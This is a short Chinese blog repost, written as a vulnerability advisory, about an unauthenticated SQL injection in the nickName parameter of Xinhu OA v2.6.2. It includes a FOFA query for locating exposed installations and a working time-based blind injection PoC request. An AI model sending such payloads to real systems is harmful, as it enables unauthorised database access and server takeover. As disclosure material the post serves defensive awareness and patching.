大家好,欢迎来到IT知识分享网。
0x01 产品简介
信呼OA系统是一款功能丰富、灵活易用的协同办公系统,适合中小型企业使用。其免费开源的特性使得用户可以根据自己的需求进行二次开发和定制化改造,从而更好地满足企业的管理需求。同时,系统的跨平台支持和数据自管功能也确保了用户的使用体验和数据安全。
0x02 漏洞概述
信呼OA nickName 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
0x03 影响范围
信呼OA = v2.6.2
0x04 复现环境
FOFA:app=”信呼-OA系统”
0x05 漏洞复现
PoC
GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName={
{base64enc(1' and sleep(8)#)}} HTTP/1.1免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://haidsoft.com/125725.html
